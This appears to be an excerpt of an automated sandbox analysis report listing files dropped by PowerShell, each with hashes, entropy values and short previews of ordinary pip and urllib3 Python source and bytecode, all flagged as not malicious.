                                                                                                                                                                                                              SHA-512:73CEB507E3863AD1355498DA0F677571EBF775FC1017183803B783FA745FC0B78889212C0ACB027950CE40B0E25CEB8BCF63A3458F281249430F70673C498648
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import errno.import itertools.import logging.import os.path.import tempfile.import traceback.from contextlib import ExitStack, contextmanager.from pathlib import Path.from typing import (. Any,. Callable,. Dict,. Generator,. List,. Optional,. TypeVar,. Union,.)..from pip._internal.utils.misc import enum, rmtree..logger = logging.getLogger(__name__).._T = TypeVar("_T", bound="TempDirectory")...# Kinds of temporary directories. Only needed for ones that are.# globally-managed..tempdir_kinds = enum(. BUILD_ENV="build-env",. EPHEM_WHEEL_CACHE="ephem-wheel-cache",. REQ_BUILD="req-build",.)..._tempdir_manager: Optional[ExitStack] = None...@contextmanager.def global_tempdir_manager() -> Generator[None, None, None]:. global _tempdir_manager. with ExitStack() as stack:. old_tempdir_manager, _tempdir_manager = _tempdir_manager, stack. try:. yield. finally:. _tempdir_manager = old_tempdir_manager...class TempDirecto
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8821
                                                                                                                                                                                                              Entropy (8bit):4.428223920452587
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:yFfRQWGbY5i3q0En361k7xHWOvhUg4trsHMh2UWcvdtjck8NxtBxtRe1ZXM8hyc:o7P5Gq0E368ZvuthzvZ8NxtBxtReAQ
                                                                                                                                                                                                              MD5:1F709C05BB91A3BF657BEC730B3FF8D5
                                                                                                                                                                                                              SHA1:9761F6164167AF6B9EF5F4BDB68299B6C48DB277
                                                                                                                                                                                                              SHA-256:4816F6895D5CADBF3D30345310A63CE91E00FD43960294D09FD55055C3033A51
                                                                                                                                                                                                              SHA-512:3CD2CD55E747F9A96A9F967367530DD10A0887A778BDA8DACADA5D204943BE59E92E21ED62A58DF23592A0F02544CE6C59B6F06EC2CB835E1EBCB14AE8338FB6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Utilities related archives.."""..import logging.import os.import shutil.import stat.import tarfile.import zipfile.from typing import Iterable, List, Optional.from zipfile import ZipInfo..from pip._internal.exceptions import InstallationError.from pip._internal.utils.filetypes import (. BZ2_EXTENSIONS,. TAR_EXTENSIONS,. XZ_EXTENSIONS,. ZIP_EXTENSIONS,.).from pip._internal.utils.misc import ensure_dir..logger = logging.getLogger(__name__)...SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS..try:. import bz2 # noqa.. SUPPORTED_EXTENSIONS += BZ2_EXTENSIONS.except ImportError:. logger.debug("bz2 module is not available")..try:. # Only for Python 3.3+. import lzma # noqa.. SUPPORTED_EXTENSIONS += XZ_EXTENSIONS.except ImportError:. logger.debug("lzma module is not available")...def current_umask() -> int:. """Get the current umask which involves having to set it temporarily.""". mask = os.umask(0). os.umask(mask). return mask...def split_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1759
                                                                                                                                                                                                              Entropy (8bit):4.587172040585541
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:BHphSbWppG7XgI/LwN8C8Q0U9XUOsunuf90ZQ1XZ6feSv:rfpOgcLspYOsMuV0ZQ9OXv
                                                                                                                                                                                                              MD5:918837F1E3B41DCD1CE4B7A334BDF84F
                                                                                                                                                                                                              SHA1:FFB06FCE78F5DA3DFA1BF3F8B428DDA882893684
                                                                                                                                                                                                              SHA-256:02169EB141A5FBD8ADEAEBC6E9FB053CEAFDCA716919A4CC938B795D35FB67F4
                                                                                                                                                                                                              SHA-512:102286AFB35EF9EF3220FC4C247DE22139FE05A0DE995288E0DF1FC997DD4396F87CCF2C9505B5EF82FC2FF9A3D0B8043A03BF80903B5785AC34C00D44065727
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os.import string.import urllib.parse.import urllib.request.from typing import Optional..from .compat import WINDOWS...def get_url_scheme(url: str) -> Optional[str]:. if ":" not in url:. return None. return url.split(":", 1)[0].lower()...def path_to_url(path: str) -> str:. """. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. """. path = os.path.normpath(os.path.abspath(path)). url = urllib.parse.urljoin("file:", urllib.request.pathname2url(path)). return url...def url_to_path(url: str) -> str:. """. Convert a file: URL to a path.. """. assert url.startswith(. "file:". ), f"You can only turn file: urls into filenames (not {url!r})".. _, netloc, path, _, _ = urllib.parse.urlsplit(url).. if not netloc or netloc == "localhost":. # According to RFC 8089, same as empty authority.. netloc = "". elif WINDOWS:. # If we have a UNC path, prepend UNC share notati
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3456
                                                                                                                                                                                                              Entropy (8bit):4.796313154979711
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ri5HUYfOUVBSjKR1d0JK1PTgBHHf5VjeY3jowoVEod7MOSQiy7d1G/:ryf/sKRb0cPTCBtpoeox/SQDfG/
                                                                                                                                                                                                              MD5:15111B45000FB18281FB5DFE8DC4EF70
                                                                                                                                                                                                              SHA1:14CB66AA6EA7945B643769280466DA0FD10FEBAC
                                                                                                                                                                                                              SHA-256:4BA7FB72C628AD1A620FA72F9F78C849961CDC8F0F242E371F988C1694401035
                                                                                                                                                                                                              SHA-512:16A2360E23C1CFBFABF4F171B4D989094B8FE9F8AA6842930D5C8BD6DCED85DE206B448DF5F29E3495A95A0E5495813AB4049A015B04B3905D62E86BB8DFF678
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import os.import re.import site.import sys.from typing import List, Optional..logger = logging.getLogger(__name__)._INCLUDE_SYSTEM_SITE_PACKAGES_REGEX = re.compile(. r"include-system-site-packages\s*=\s*(?P<value>true|false)".)...def _running_under_venv() -> bool:. """Checks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. """. return sys.prefix != getattr(sys, "base_prefix", sys.prefix)...def _running_under_legacy_virtualenv() -> bool:. """Checks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. """. # pypa/virtualenv case. return hasattr(sys, "real_prefix")...def running_under_virtualenv() -> bool:. """True if we're running inside a virtual environment, False otherwise.""". return _running_under_venv() or _running_under_legacy_virtualenv()...def _get_pyvenv_cfg_lines() -> Optional[List[str]]:. """Reads {sys.prefix}/pyvenv.cfg and returns
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4499
                                                                                                                                                                                                              Entropy (8bit):4.752610172437855
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KrIg+2rhcy2TRgR/1XRLrDtNxu5Sfs8nkm2dHwvqwBfg8g4k:klplYtgRLLrhNYUfs89f5B4h4k
                                                                                                                                                                                                              MD5:576FFCEAB3FF43B59DACB1950B7A734B
                                                                                                                                                                                                              SHA1:EBEBECB94DF0AEE12848FE846E7D2CAF9FB617AE
                                                                                                                                                                                                              SHA-256:8B807050D1DAB6DCCDD22C72DC7040174E2D64F461D82731693EADF3ABE2C241
                                                                                                                                                                                                              SHA-512:8640CCB2B119FAB0AD265CAB76EF24970ABF9CFF26588D85606F5317C195F233D044A7485631F795EB40C79DFAF2CD1669D57AEA955EA01230D04527E3F484AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Support functions for working with wheel files.."""..import logging.from email.message import Message.from email.parser import Parser.from typing import Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import UnsupportedWheel..VERSION_COMPATIBLE = (1, 0)...logger = logging.getLogger(__name__)...def parse_wheel(wheel_zip: ZipFile, name: str) -> Tuple[str, Message]:. """Extract information from the provided wheel, ensuring it meets basic. standards... Returns the name of the .dist-info directory and the parsed WHEEL metadata.. """. try:. info_dir = wheel_dist_info_dir(wheel_zip, name). metadata = wheel_metadata(wheel_zip, info_dir). version = wheel_version(metadata). except UnsupportedWheel as e:. raise UnsupportedWheel(f"{name} has an invalid wheel, {str(e)}").. check_compatibility(version, name).. return info_dir, metadata...def wheel_dist_info_d
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):205
                                                                                                                                                                                                              Entropy (8bit):4.770548168826921
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1AlU/Vneq95/n23d6oAr6XOP6Iaatgem/l:1Z/Vec/2IkGjaatHmt
                                                                                                                                                                                                              MD5:F5A615642435A6106958BB2E066D38B5
                                                                                                                                                                                                              SHA1:29E3ECF03BB8B49744BA4C1840251672AD8C99D7
                                                                                                                                                                                                              SHA-256:45132E9CD2B58B0CA5F129289D477C99213AFC61D25B3AF58B689F7231BA2483
                                                                                                                                                                                                              SHA-512:08E2B297838E5AA80F585B10811AB1AF8662487F5F14B29D050966FA01299D66064DF84589B70FFA6B4D4AC72AD8D39F4D53883CBA4ACB3A20886613C2CA1B03
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e................................y.).N..r..........lC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/contrib/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26942
                                                                                                                                                                                                              Entropy (8bit):5.240182273072874
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:iPR21/UCuapbLk4FY9nlYdbHXkyVQlU9gML7DKs1c:iPR21/9d/9TLXLc
                                                                                                                                                                                                              MD5:789F9470B0E899DEC7F9616022FAD12B
                                                                                                                                                                                                              SHA1:D1C73EF255074F169F1F0DD917F431BA643299C0
                                                                                                                                                                                                              SHA-256:A7B0184A0DB411B6DF64171869E7B808ECBA56BAAC7D8229B72D20CFACD0D5AD
                                                                                                                                                                                                              SHA-512:DAF5FE88748C32147A24A8E2E68F10563E2CD35C6C652A874612A821B40AE34A5C11603ADA0BE1B122B67FCE1F625B58C2143F37A485A79EFECE6EF88766AC1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e.J.............................U.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j*..................r.d.d.l.m.Z...d.d.g.Z.e.j2..................j4..................e.j6..................j8..................e.j2..................j:..................e.j6..................j8..................e.j<..................e.j6..................j>..................i.Z d.e!d.<.....e"e.d.........r6..e"e.j6..................d.........r#e.j6..................jF..................e e.jH..................<.....e"e.d.........r6..e"e.j6..................d.........r#e.j6..................jJ..................e e.jL..................<...e.jN..................e.j6..................jP..................e.jR..................e.j6..................jT..................e.jV..................e.j6..................jT..................e.j6..................jX..................z...i.Z-e-j]..........................D.....c.i.c.]...\.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8181
                                                                                                                                                                                                              Entropy (8bit):5.701225040705965
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:N8NVEqtuw9n/HHgPcsh8trzbQkEsHHs5aAfM:N8vEAXvHgPcshmbQkZHMoAfM
                                                                                                                                                                                                              MD5:17F45DE2BB953332F05A95F137328D65
                                                                                                                                                                                                              SHA1:80BF686F3AD7167D32B9E2DD0AC4870A3D172E0B
                                                                                                                                                                                                              SHA-256:B604498F3CFA39157E0993958EFE8AE06EAA893D8B11988C9B9594AE4BD6A253
                                                                                                                                                                                                              SHA-512:521EAB713BC3F267AD0668EEF784F7929B79E72150F5A0C98F84B557799AD6861B061AE04EF5E6C6069E8AD32F5C8915F2BB2426241E31EE24A829D70B3C0D6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e..........................~.....d.Z.d.d.l.m.Z.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z y.#.e.$.r...d.d.l.Z.d.d.l.m.Z.....e.j...................d.e.............w.x.Y.w.#.e.$.r...d.Z.Y..zw.x.Y.w.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- U
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):733
                                                                                                                                                                                                              Entropy (8bit):4.527161799307811
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1RjscOstNQm7icj7iMNfAKgX4vkvW2CXAo07icBNro07iMN0T7icPuT7iMNv:1Rp1tvAfNuzn4WnJq
                                                                                                                                                                                                              MD5:C6960672D5A330E53A2557CFCC64D430
                                                                                                                                                                                                              SHA1:CE27902CAFC40DBD0013400D817460E4F6BFAEF2
                                                                                                                                                                                                              SHA-256:BBA28D8338E51596EE0005DAFF26C247B810EF55491129C5F8821D0C0EF76EBC
                                                                                                                                                                                                              SHA-512:83C411239F0C147A44FDD7A251A07EF3BDA7D922C7CA9EA61C76A9DDD58DABFDDFD20A968C799FD3CE142CBEF335484A9A45F574A329E80A7BD7D3C3F9AA9B36
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import urllib3.connection..from ...connectionpool import HTTPConnectionPool, HTTPSConnectionPool.from .connection import EmscriptenHTTPConnection, EmscriptenHTTPSConnection...def inject_into_urllib3() -> None:. # override connection classes to use emscripten specific classes. # n.b. mypy complains about the overriding of classes below. # if it isn't ignored. HTTPConnectionPool.ConnectionCls = EmscriptenHTTPConnection. HTTPSConnectionPool.ConnectionCls = EmscriptenHTTPSConnection. urllib3.connection.HTTPConnection = EmscriptenHTTPConnection # type: ignore[misc,assignment]. urllib3.connection.HTTPSConnection = EmscriptenHTTPSConnection # type: ignore[misc,assignment].
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                              Entropy (8bit):4.890470446446548
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:18Bl9TptNIreab/icpOiMNi/JxoLwShN1R/2Ikhp9UezQvs2rdlKYAy3:87NGpnJxoZ23lmrwy3
                                                                                                                                                                                                              MD5:ACF7B7497EAEF1ED33FE0EFA453D0258
                                                                                                                                                                                                              SHA1:0D5053472B728F77BDD4B49BD0C302C14F1508CA
                                                                                                                                                                                                              SHA-256:65EBEE375E22EC1C2AB64AB638825B4B2EFE4982561829EDDD9C9C6708F7EF22
                                                                                                                                                                                                              SHA-512:9EE17AC37CBA91FF4A0C775840F31AA2E7DA8FB93F7BE78D202B403FE655013ED259BCCAE533F6E4C59B3C25DF90C0A9B6E01F9E8592E26B1474C2819C592750
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e..........................@.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.y.)......)...annotationsN.....)...HTTPConnectionPool..HTTPSConnectionPool.....)...EmscriptenHTTPConnection..EmscriptenHTTPSConnectionc..........................t.........t........._.........t.........t........._.........t.........t.........j..................._.........t.........t.........j..................._.........y.).N).r....r......ConnectionClsr....r......urllib3..connection..HTTPConnection..HTTPSConnection........wC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/contrib/emscripten/__init__.py..inject_into_urllib3r........s3........(@......$.(A.....%.(@.G........%.)B.G........&r....)...return..None)...__future__r......urllib3.connectionr......connectionpoolr....r....r....r....r....r....r....r....r......<module>r........s...........".....E..K....C.r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10252
                                                                                                                                                                                                              Entropy (8bit):5.432598389187291
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EnrPSoc4/D/tzzirVUbmyl+bkGzgjcTHbMF/vOzycB:EjJc47/NipYm8qtzScTgF/vOzP
                                                                                                                                                                                                              MD5:42B82BD3D56BBC728B35B6FFD26A3E58
                                                                                                                                                                                                              SHA1:B60B7812815235A365D96965EF3DE2516FC02E63
                                                                                                                                                                                                              SHA-256:56C3780EC746028E4B74D0C0FD51A74F7642F7C92B573CABAC77728F47FE92CC
                                                                                                                                                                                                              SHA-512:40EC652DBC38107106CFBDE2949255D891E40FB3290E89A55B785D0C0E52A94C7493653C98A3CDD08EB48C86017DFBA7256586309EA20C70D7971F8AF4A19379
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e3"........................r.....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z ..e.jB..................r.d.d.l.m"Z"m#Z#....G.d...d.........Z$..G.d...d.e$........Z%e.jB..................r...e$d.d.........Z&d.e'd.<.....e%d.d.........Z(d.e'd.<...y.y.)......)...annotationsN)...HTTPException)...ResponseNotReady.....)..._TYPE_BODY)...HTTPConnection..ProxyConfig..port_by_scheme)...TimeoutError)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Url.....)..._RequestError.._TimeoutError..send_request..send_streaming_request)...EmscriptenRequest)...EmscriptenHttpResponseWrapper..EmscriptenResponse)...BaseHTTPConnection..BaseHTTPSConnectionc..........................e.Z.d.Z.U.e.d.....Z.d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.Z.d.e.d.<...d.Z.d.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 27142-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 10633823966279326983230456482242756608.000000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18385
                                                                                                                                                                                                              Entropy (8bit):5.123054817877374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:jaoJTDWFD3LvKbjbhHqFpfGpGzIqfBHuq5G904PAMda3IcApagp/Ooa7XgvqvEKK:jFJTkrrAhXKB7BMM3InagIj7wvqcKET
                                                                                                                                                                                                              MD5:E051C51B8A0981D379F4418491E4CAAF
                                                                                                                                                                                                              SHA1:14D1A30BE2C0313CE0BE25968506953D0FD8B4CD
                                                                                                                                                                                                              SHA-256:BD2029C4BEA6FFA41048D2A02C2AD4B97C4D2E784B9612F4CB356C42B239BB7E
                                                                                                                                                                                                              SHA-512:E22A149A12FF8DA2383F983637E7721E86FC0B00A1408B1B5D496258E778C8C96D9F834D769989A6354500097B5733785648A8D29B17BBD5EA7B054DABD55625
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e37........................4.....U.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.Z.d.Z.d.Z.d.Z.d.Z...e.e.........j=..................d.........j?..................d...........Z ..G.d...d.e!........Z"..G.d...d.e"........Z#..G.d...d.e"........Z$d,d...Z%..G.d...d.e.jL..........................Z'..G.d...d.........Z(d-d...Z)d-d ..Z*d-d!..Z+d-d"..Z,d.Z-d#e.d$<.....e,........r...e*........r...e)........s...e+........s...e(........Z-n.d.Z-d.d%..Z/d&a0d/d'..Z1d&a2d/d(..Z3d0d)..Z4d1d*..Z5d-d+..Z6y.)2a.....Support for streaming http requests in emscripten...A few caveats -..Firstly, you can't do streaming http in the main UI thread, because atomics.wait isn't allowed..Streaming only works if you're running pyodide in a web worker...Secondly, this uses an extra web worker and SharedArrayBuffer to do the asynchronous fetch.operation, so it requires that you have crossOriginIsolation enab
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1433
                                                                                                                                                                                                              Entropy (8bit):5.3279481544539555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:ovlV9p5aBELSn0hqt6DMqEFc23iDt8J6+ibUKHt594LdsXO/PMl:anauLG0k6DMDFc2eIibY6+/kl
                                                                                                                                                                                                              MD5:6237134A3AEEEB91805767B24CFC1F86
                                                                                                                                                                                                              SHA1:C7750AC443755C4B0CC3837707E7A2A9A905A25F
                                                                                                                                                                                                              SHA-256:027DFF0B3243ED0C617AE3DD5CD0BDB9FB90E5BEB88D1062A5C1BAA176B0EC9A
                                                                                                                                                                                                              SHA-512:C57ABDC248724236BA96E3A7E178EF7AB413C3BC52EA2A823310AF773AB558E956973675194DDF4105A578D7B5D6EE731EEFAAA7050A7D547A218557DCD0A2C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.e6.........................J.....d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e...G.d...d.................Z.y.)......)...annotations)...dataclass..field.....)..._TYPE_BODYc..........................e.Z.d.Z.U.d.e.d.<...d.e.d.<...d.Z.d.e.d.<...d.Z.d.e.d.<.....e.e...........Z.d.e.d.<...d.Z.d.e.d.<...d.Z.d.e.d.<...d.d...Z.d.d...Z.y.)...EmscriptenRequest..str..method..urlNz.dict[str, str] | None..params.._TYPE_BODY | None..body)...default_factoryz.dict[str, str]..headersr......float..timeoutT..bool..decode_contentc.....................>.....|.|.j...................|.j...........................<...y...N).r......capitalize)...self..name..values.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/contrib/emscripten/request.py..set_headerz.EmscriptenRequest.set_header....s.......*/.......T._._..&..'.....c...........................|.|._.........y.r....).r....).r....r....s.... r......set_bodyz.EmscriptenRequest.set_body....s.............r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12252
                                                                                                                                                                                                              Entropy (8bit):5.110058980873684
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:y9sEdeDLTQ6sYzmgQLYgV/ye51kKL1k82s7li3QwDWPBdywGPGywdRdgQIK9/:yiE+TQ6sAC/ySDpbliMZdy1PGyWngQVF
                                                                                                                                                                                                              MD5:89A2373A319571922031B9EB816E4595
                                                                                                                                                                                                              SHA1:2AB5EB0720751CA68389EA698D04AFCF7806FBC7
                                                                                                                                                                                                              SHA-256:BF6F72EF745F08E6205B8E3506EBE93305171040514E0DFEF5855BB24815A108
                                                                                                                                                                                                              SHA-512:4D1BE5372436D88AB052DD98933C4BDCD27A97A618199CACC4CDB1FB7E490F4DDB2C4FB7F26B8666903D6C5397599FF93DA2BD89E810758BEFC8BE748010469D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........Hl.eJ%..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j0..................r.d.d.l.m.Z.m.Z.....e.j8..................e.........Z.e...G.d...d.................Z...G.d...d.e.........Z y.)......)...annotationsN)...contextmanager)...dataclass)...HTTPException)...BytesIO..IOBase.....)...InvalidHeader..TimeoutError)...BaseHTTPResponse)...Retry.....)...EmscriptenRequest)...BaseHTTPConnection..BaseHTTPSConnectionc.....................6.....e.Z.d.Z.U.d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...y.)...EmscriptenResponse..int..status_codez.dict[str, str]..headersz.IOBase | bytes..bodyr......requestN)...__name__..__module__..__qualname__..__annotations__........wC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/contrib/emscripten/response.pyr....r........s..............................r....r....c.....................J.......e.Z.d.Z.....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8755
                                                                                                                                                                                                              Entropy (8bit):4.497525459881081
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:8Ebt+waKt1H9ytP3r7NSWVfbf8hjOnVrif9OwvMfDtF:Pblto/rj7WMZF
                                                                                                                                                                                                              MD5:B2484A578058171D7E25A65AD1522D0E
                                                                                                                                                                                                              SHA1:5B6FD60E13C2B2F5E362BEC69F648DADF89D5675
                                                                                                                                                                                                              SHA-256:91A05EDAD5ADED8CBDBCD50544157B092C839DF8426082C6C63BBD293663F12C
                                                                                                                                                                                                              SHA-512:ADA160189EBA57085B0D0E93FDC17361C0B62E4206C562832C16466D0CB4FCD80F25D464736DA5E7B036DBDA97F82F9B6278BAC2F094DDB34EEC182B994FDC94
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import os.import typing..# use http.client.HTTPException for consistency with non-emscripten.from http.client import HTTPException as HTTPException # noqa: F401.from http.client import ResponseNotReady..from ..._base_connection import _TYPE_BODY.from ...connection import HTTPConnection, ProxyConfig, port_by_scheme.from ...exceptions import TimeoutError.from ...response import BaseHTTPResponse.from ...util.connection import _TYPE_SOCKET_OPTIONS.from ...util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT.from ...util.url import Url.from .fetch import _RequestError, _TimeoutError, send_request, send_streaming_request.from .request import EmscriptenRequest.from .response import EmscriptenHttpResponseWrapper, EmscriptenResponse..if typing.TYPE_CHECKING:. from ..._base_connection import BaseHTTPConnection, BaseHTTPSConnection...class EmscriptenHTTPConnection:. default_port: typing.ClassVar[int] = port_by_scheme["http"]. default_socket_options: ty
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3655
                                                                                                                                                                                                              Entropy (8bit):4.6612783191186296
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:+oqyr3+5Jm/HwlC8qDxRLF2ASKVwb5o+RNzJj8NlVYMMbL/Qq9SRNRJOw40pBRXv:+op+5JmPWCjbF2R5PH4lHMbL/QLOz0p/
                                                                                                                                                                                                              MD5:CD5FB56C8115E0DB8EB92FF3FBE9960A
                                                                                                                                                                                                              SHA1:3D1704D964E37D527D888A606FFC62894520DBFF
                                                                                                                                                                                                              SHA-256:0837D817FF420E86EDC7694689DC89D738C312FC0D4F917E75C8665565C38741
                                                                                                                                                                                                              SHA-512:A414EA8983DA012F9EB8246A36C016D9ACA2FAD2B74F577297B4D02D37D6E5366DADF9993AB92915C3B3A1116D57423B1CF49076F586B3E51F053D9483F87179
                                                                                                                                                                                                              Malicious:false
